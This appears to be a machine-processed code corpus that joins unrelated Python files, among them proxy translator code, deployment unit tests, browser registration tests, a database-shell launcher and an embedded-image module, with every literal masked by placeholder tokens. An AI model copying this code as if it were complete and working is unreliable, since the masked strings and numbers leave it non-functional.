<EOL> return command <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_after_send_command ( self , session_id , response ) : <EOL> return response <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_before_send_file ( self , session_id , file ) : <EOL> return file <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_after_send_file ( self , session_id , response ) : <EOL> return response <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_on_finish ( self , session_id ) : <EOL> super ( StoresEverythingTranslator , self ) . do_on_finish ( session_id ) <EOL> class StoresEverythingExceptForFilesTranslator ( StoresEverythingTranslator ) : <EOL> @ Override ( StoresEverythingTranslator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_before_send_file ( self , session_id , file ) : <EOL> return None <EOL> @ Override ( StoresEverythingTranslator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_after_send_file ( self , session_id , response ) : <EOL> return None </s>
<s> import sys <EOL> import os . path <EOL> import re <EOL> if len ( sys . argv ) != <NUM_LIT:2> : <EOL> print >> sys . stderr , "<STR_LIT>" % sys . argv [ <NUM_LIT:0> ] <EOL> print >> sys . stderr , "<STR_LIT>" % sys . argv [ <NUM_LIT:0> ] <EOL> sys . exit ( - <NUM_LIT:1> ) <EOL> if not os . path . exists ( sys . argv [ <NUM_LIT:1> ] ) : <EOL> print >> sys . stderr , "<STR_LIT>" % sys . argv [ <NUM_LIT:0> ] <EOL> print >> sys . stderr , "<STR_LIT>" % sys . argv [ <NUM_LIT:0> ] <EOL> sys . exit ( - <NUM_LIT:2> ) <EOL> started = { <EOL> } <EOL> CALL_ID_REGEX = '<STR_LIT>' <EOL> CALL_START_REGEX = r'<STR_LIT>' <EOL> CALL_END_REGEX = r'<STR_LIT>' <EOL> for line in open ( sys . argv [ <NUM_LIT:1> ] ) : <EOL> mo = re . match ( CALL_START_REGEX % CALL_ID_REGEX , line ) <EOL> if mo != None : <EOL> call_id = mo . groups ( ) [ <NUM_LIT:0> ] <EOL> if started . has_key ( call_id ) : <EOL> number , lines_start , lines_end = started [ call_id ] <EOL> lines_start . append ( line ) <EOL> started [ call_id ] [ <NUM_LIT:0> ] = number + <NUM_LIT:1> <EOL> else : <EOL> started [ call_id ] = [ <NUM_LIT:1> , [ line ] , [ ] ] <EOL> else : <EOL> mo = re . match ( CALL_END_REGEX % CALL_ID_REGEX , line ) <EOL> if mo != None : <EOL> call_id = mo . groups ( ) [ <NUM_LIT:0> ] <EOL> if started . has_key ( call_id ) : <EOL> number , lines_start , lines_end = started [ call_id ] <EOL> if number == <NUM_LIT:1> : <EOL> started . pop ( call_id ) <EOL> else : <EOL> lines_end . append ( line ) <EOL> started [ call_id ] [ <NUM_LIT:0> ] = number - <NUM_LIT:1> <EOL> for call_id in started : <EOL> print started [ call_id ] [ <NUM_LIT:1> : ] </s>
<s> import os <EOL> import unittest <EOL> import shutil <EOL> import wcloud . tasks . wcloud_tasks as wcloud_tasks <EOL> from weblab . admin . script import Creation <EOL> cwd = os . getcwd ( ) <EOL> if cwd . endswith ( os . path . join ( "<STR_LIT>" , "<STR_LIT:test>" ) ) : <EOL> cwd = cwd [ <NUM_LIT:0> : len ( cwd ) - len ( os . path . join ( "<STR_LIT>" , "<STR_LIT:test>" ) ) ] <EOL> os . chdir ( os . path . join ( cwd , "<STR_LIT>" ) ) <EOL> class TestWcloudTasks ( unittest . TestCase ) : <EOL> wcloud_settings = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:password>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> def test_nothing ( self ) : <EOL> pass <EOL> def test_prepare_system ( self ) : <EOL> settings = wcloud_tasks . prepare_system . delay ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:password>" , "<STR_LIT>" , <EOL> self . wcloud_settings ) . get ( ) <EOL> self . _settings = settings <EOL> def test_create_weblab_environment ( self ) : <EOL> settings = wcloud_tasks . prepare_system . delay ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:password>" , "<STR_LIT>" , <EOL> self . wcloud_settings ) . get ( ) <EOL> self . _settings = settings <EOL> base_url = os . path . join ( wcloud_tasks . flask_app . config [ "<STR_LIT>" ] , settings [ Creation . BASE_URL ] ) <EOL> wcloud_tasks . create_weblab_environment . delay ( base_url , settings ) . get ( ) <EOL> def test_configure_web_server ( self ) : <EOL> settings = wcloud_tasks . prepare_system . delay ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:password>" , "<STR_LIT>" , <EOL> self . wcloud_settings ) . get ( ) <EOL> self . _settings = settings <EOL> base_url = os . path . join ( wcloud_tasks . flask_app . config [ "<STR_LIT>" ] , settings [ Creation . BASE_URL ] ) <EOL> creation_results = wcloud_tasks . create_weblab_environment . delay ( base_url , settings ) . get ( ) <EOL> wcloud_tasks . configure_web_server . delay ( creation_results ) . get ( ) <EOL> def test_register_and_start_instance ( self ) : <EOL> settings = wcloud_tasks . prepare_system . delay ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:password>" , "<STR_LIT>" , <EOL> self . wcloud_settings ) . get ( ) <EOL> self . _settings = settings <EOL> base_url = os . path . join ( wcloud_tasks . flask_app . config [ "<STR_LIT>" ] , settings [ Creation . BASE_URL ] ) <EOL> creation_results = wcloud_tasks . create_weblab_environment . delay ( base_url , settings ) . get ( ) <EOL> wcloud_tasks . configure_web_server . delay ( creation_results ) . get ( ) <EOL> wcloud_tasks . register_and_start_instance . delay ( "<STR_LIT>" , { } ) . get ( ) <EOL> start_port , end_port = creation_results [ "<STR_LIT>" ] , creation_results [ "<STR_LIT>" ] <EOL> def test_finish_deployment ( self ) : <EOL> settings = wcloud_tasks . prepare_system . delay ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:password>" , "<STR_LIT>" , <EOL> self . wcloud_settings ) . get ( ) <EOL> self . _settings = settings <EOL> base_url = os . path . join ( wcloud_tasks . flask_app . config [ "<STR_LIT>" ] , settings [ Creation . BASE_URL ] ) <EOL> creation_results = wcloud_tasks . create_weblab_environment . delay ( base_url , settings ) . get ( ) <EOL> wcloud_tasks . configure_web_server . delay ( creation_results ) . get ( ) <EOL> wcloud_tasks . register_and_start_instance . delay ( "<STR_LIT>" , self . wcloud_settings ) . get ( ) <EOL> start_port , end_port = creation_results [ "<STR_LIT>" ] , creation_results [ "<STR_LIT>" ] <EOL> wcloud_tasks . finish_deployment . delay ( "<STR_LIT>" , settings , start_port , end_port , self . wcloud_settings ) . get ( ) <EOL> def setUp ( self ) : <EOL> import wcloud . test . prepare as prepare <EOL> prepare . prepare_test_database ( "<STR_LIT:root>" , "<STR_LIT:password>" ) <EOL> def tearDown ( self ) : <EOL> try : <EOL> pass <EOL> except : <EOL> pass <EOL> try : <EOL> instances_file = os . path . join ( wcloud_tasks . flask_app . config [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> f = file ( instances_file ) <EOL> lines = f . readlines ( ) <EOL> lines = [ line . replace ( "<STR_LIT:\n>" , "<STR_LIT>" ) + "<STR_LIT:\n>" for line in lines if not "<STR_LIT>" in line ] <EOL> f . close ( ) <EOL> f = file ( instances_file , "<STR_LIT:w>" ) <EOL> f . writelines ( lines ) <EOL> f . close ( ) <EOL> except : <EOL> pass <EOL> apacheconf = os . path . join ( wcloud_tasks . flask_app . config [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> lines = open ( apacheconf , "<STR_LIT:r>" ) . readlines ( ) <EOL> cleared_lines = [ line . strip ( ) + "<STR_LIT:\n>" for line in lines if "<STR_LIT>" not in line ] <EOL> open ( apacheconf , "<STR_LIT:w>" ) . writelines ( cleared_lines ) <EOL> try : <EOL> os . system ( "<STR_LIT>" ) <EOL> except : <EOL> pass <EOL> try : <EOL> base_url = os . path . join ( wcloud_tasks . flask_app . config [ "<STR_LIT>" ] , self . _settings [ Creation . BASE_URL ] ) <EOL> shutil . rmtree ( base_url ) <EOL> except : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> from websauna . system . devop . cmdline import init_websauna <EOL> from websauna . utils . configincluder import monkey_patch_paster_config_parser <EOL> def usage ( argv ) : <EOL> cmd = os . path . basename ( argv [ <NUM_LIT:0> ] ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( cmd , cmd ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def main ( argv = sys . argv ) : <EOL> monkey_patch_paster_config_parser ( ) <EOL> if len ( argv ) < <NUM_LIT:2> : <EOL> usage ( argv ) <EOL> config_uri = argv [ <NUM_LIT:1> ] <EOL> request = init_websauna ( config_uri ) <EOL> url = request . registry . settings . get ( "<STR_LIT>" ) <EOL> engine = request . dbsession . get_bind ( ) <EOL> print ( "<STR_LIT>" . format ( engine ) ) <EOL> os . system ( "<STR_LIT>" . format ( url ) ) </s>
<s> from pyramid_mailer import IMailer <EOL> def get_mailer ( registry ) : <EOL> """<STR_LIT>""" <EOL> return registry . getUtility ( IMailer ) </s>
<s> from datetime import timedelta <EOL> import transaction <EOL> from websauna . system . user . models import Activation , User <EOL> from websauna . utils . slug import uuid_to_slug <EOL> from websauna . utils . time import now <EOL> EMAIL = "<STR_LIT>" <EOL> PASSWORD = "<STR_LIT>" <EOL> def get_user ( dbsession ) : <EOL> from websauna . system . user . models import User <EOL> return dbsession . query ( User ) . get ( <NUM_LIT:1> ) <EOL> def test_register_email ( web_server , browser , dbsession ) : <EOL> """<STR_LIT>""" <EOL> b = browser <EOL> b . visit ( web_server ) <EOL> b . find_by_css ( "<STR_LIT>" ) . click ( ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) <EOL> b . fill ( "<STR_LIT:email>" , EMAIL ) <EOL> b . fill ( "<STR_LIT:password>" , PASSWORD ) <EOL> b . fill ( "<STR_LIT>" , PASSWORD ) <EOL> b . find_by_name ( "<STR_LIT>" ) . click ( ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) <EOL> user = get_user ( dbsession ) <EOL> assert user . activation . code <EOL> activation_link = "<STR_LIT>" . format ( web_server , user . activation . code ) <EOL> b . visit ( activation_link ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) <EOL> b . fill ( "<STR_LIT:username>" , EMAIL ) <EOL> b . fill ( "<STR_LIT:password>" , PASSWORD ) <EOL> b . find_by_name ( "<STR_LIT>" ) . click ( ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) <EOL> def test_register_email_activation_expired ( web_server , browser , dbsession ) : <EOL> """<STR_LIT>""" <EOL> b = browser <EOL> b . visit ( web_server + "<STR_LIT>" ) <EOL> assert b . is_element_visible_by_css ( "<STR_LIT>" ) <EOL> b . fill ( "<STR_LIT:email>" , EMAIL ) <EOL> b . fill ( "<STR_LIT:password>" , PASSWORD ) <EOL> b . fill ( "<STR_LIT>" , PASSWORD ) <EOL> b . find_by_name ( "<STR_LIT>" ) . click ( ) <EOL> assert b . is_element_visible_by_css ( "<STR_LIT>" ) <EOL> with transaction . manager : <EOL> a = dbsession . query ( Activation ) . get ( <NUM_LIT:1> ) <EOL> u = dbsession . query ( User ) . get ( <NUM_LIT:1> ) <EOL> a . expires_at = now ( ) - timedelta ( days = <NUM_LIT> ) <EOL> user_uuid = u . uuid <EOL> activation_code = a . code <EOL> activation_link = "<STR_LIT>" . format ( web_server , activation_code ) <EOL> b . visit ( activation_link ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) <EOL> b . visit ( web_server + "<STR_LIT>" ) <EOL> b . fill ( "<STR_LIT:username>" , EMAIL ) <EOL> b . fill ( "<STR_LIT:password>" , PASSWORD ) <EOL> b . find_by_name ( "<STR_LIT>" ) . click ( ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) <EOL> b . visit ( web_server + "<STR_LIT>" ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) <EOL> b . fill ( "<STR_LIT:email>" , EMAIL ) <EOL> b . find_by_name ( "<STR_LIT>" ) . click ( ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) <EOL> with transaction . manager : <EOL> user = get_user ( dbsession ) <EOL> activation = user . activation <EOL> activation_code = activation . code <EOL> b . visit ( "<STR_LIT>" . format ( web_server , activation_code ) ) <EOL> b . fill ( "<STR_LIT:password>" , "<STR_LIT>" ) <EOL> b . fill ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> b . find_by_name ( "<STR_LIT>" ) . click ( ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) <EOL> b . fill ( "<STR_LIT:username>" , EMAIL ) <EOL> b . fill ( "<STR_LIT:password>" , "<STR_LIT>" ) <EOL> b . find_by_name ( "<STR_LIT>" ) . click ( ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) </s>
<s> from django . contrib import admin <EOL> from testproj . testapp import models <EOL> admin . site . register ( models . SecretFile ) </s>
<s> from db . conn import ( <EOL> test as _test , <EOL> food as _food , <EOL> user as _user , <EOL> test_files as _test_files , <EOL> food_files as _food_files , <EOL> user_files as _user_files , <EOL> ) <EOL> MONGO_DB_MAPPING = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:test>' : _test , <EOL> '<STR_LIT>' : _food , <EOL> '<STR_LIT:user>' : _user , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:test>' : _test_files , <EOL> '<STR_LIT>' : _food_files , <EOL> '<STR_LIT:user>' : _user_files , <EOL> } <EOL> } </s>
<s> from wx . lib . embeddedimage import PyEmbeddedImage <EOL> retriever_logo_liberation = PyEmbeddedImage ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> getretriever_logo_liberationData = retriever_logo_liberation . GetData <EOL> 